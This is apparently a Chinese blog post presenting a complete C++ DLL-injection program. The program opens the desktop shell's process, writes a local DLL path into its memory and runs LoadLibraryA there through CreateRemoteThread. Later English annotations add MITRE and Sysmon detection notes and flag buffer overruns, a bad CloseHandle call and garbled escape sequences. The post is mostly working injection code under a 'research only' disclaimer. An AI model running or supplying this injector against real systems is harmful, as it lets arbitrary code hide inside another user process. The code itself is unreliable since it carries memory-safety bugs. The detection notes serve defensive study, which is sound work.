Dll文件简单注入系统进程

//Dll注入系统,注入的文件名为Dll.dll;
//本文仅供研究不得用于非法用途,后果自负
// RemoteThreadDll.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include 
#include 
// Console entry point. Builds the path "<current directory>//Dll.dll", finds the
// process that owns the "Progman" / "Program Manager" window, copies the path
// into memory allocated inside that process, and starts a thread there whose
// start routine is LoadLibraryA with the copied path as its argument.
// This is the CreateRemoteThread + LoadLibrary form of DLL injection
// (MITRE ATT&CK T1055.001).
//
// Parameters: argc and argv are not used.
// Returns:    0 on every path, including all failure paths.
//
// Defender notes: the sequence below (OpenProcess with CREATE_THREAD / VM_OPERATION /
// VM_WRITE rights on another process, VirtualAllocEx, WriteProcessMemory, then
// CreateRemoteThread starting at LoadLibraryA) is what EDR products and Sysmon
// (Event ID 10 ProcessAccess, Event ID 8 CreateRemoteThread, Event ID 7 ImageLoad)
// are typically configured to flag. An unexpected module loaded into the shell
// process from a user-writable directory is the resulting artefact to hunt for.
int main(int argc, char* argv[])
{
       HWND hand;
       HANDLE hProcess;
       HMODULE hmod;
       // NOTE(review): the buffer is 256 bytes, but MAX_PATH (260 in the Windows
       // headers) is passed as its size below and lstrcat appends without a bound,
       // so a long working directory can overrun this stack buffer.
       char szMyDllFull[256];
       DWORD dwThreadID=NULL,dwProcessID=NULL ;
       PDWORD lpLoadLibrary,lpDllName;
       GetCurrentDirectory(MAX_PATH,szMyDllFull);
       // NOTE(review): "//" here and "/n" in the printf calls look like backslashes
       // lost when the page was extracted; as written, "/n" prints the two
       // characters '/' and 'n', not a newline. Confirm against the original post.
       lstrcat(szMyDllFull,"//Dll.dll");
       printf("%s/n",szMyDllFull);
       // Address of LoadLibraryA as seen in THIS process; it is passed unchanged as
       // the remote thread's start routine below. Neither return value is checked.
       hmod=GetModuleHandle("kernel32.dll");
       lpLoadLibrary=(PDWORD)GetProcAddress(hmod,"LoadLibraryA");
       // Window class "Progman" with title "Program Manager" is the desktop shell
       // window (normally owned by explorer.exe); it is used here only to obtain a
       // target process id.
       hand=FindWindow("Progman","Program Manager");
              if(hand==NULL)
       {
              // The message reads "cannot find program manager" (a runtime string, left as is).
              printf("找不到 progarm manager/n");
              return 0;
       }
       // Returns the owning thread id and stores the owning process id in dwProcessID.
       dwThreadID=GetWindowThreadProcessId(hand,&dwProcessID);
       // Requests exactly the rights needed to allocate, write and start a thread in
       // the target; a handle to another process with this access mask is a
       // high-signal detection point.
       hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwProcessID);
       if(hProcess!=NULL)
       {
              // Commits MAX_PATH bytes of read/write memory inside the target process.
              lpDllName=(PDWORD)VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE);
              // NOTE(review): %x with a pointer argument is a format/type mismatch.
              printf("%x/n",lpDllName);
              // NOTE(review): copies MAX_PATH bytes out of the 256-byte local buffer,
              // i.e. reads past the end of szMyDllFull; the result is not checked.
              WriteProcessMemory(hProcess,lpDllName,szMyDllFull,MAX_PATH,NULL);
              // The remote thread runs LoadLibraryA(lpDllName) in the target. The
              // returned thread handle is discarded and never closed, and failure
              // is not detected.
              CreateRemoteThread(hProcess,NULL,0, (LPTHREAD_START_ROUTINE )lpLoadLibrary,lpDllName,0,NULL);
              // NOTE(review): lpDllName is a memory address in the target process, not
              // a handle, so this call does not release the remote allocation.
              CloseHandle(lpDllName);
              CloseHandle(hProcess);
              //ExitProcess(NULL);
       }
       else
              // Reached when OpenProcess fails.
              printf("faile/n");
       return 0;
}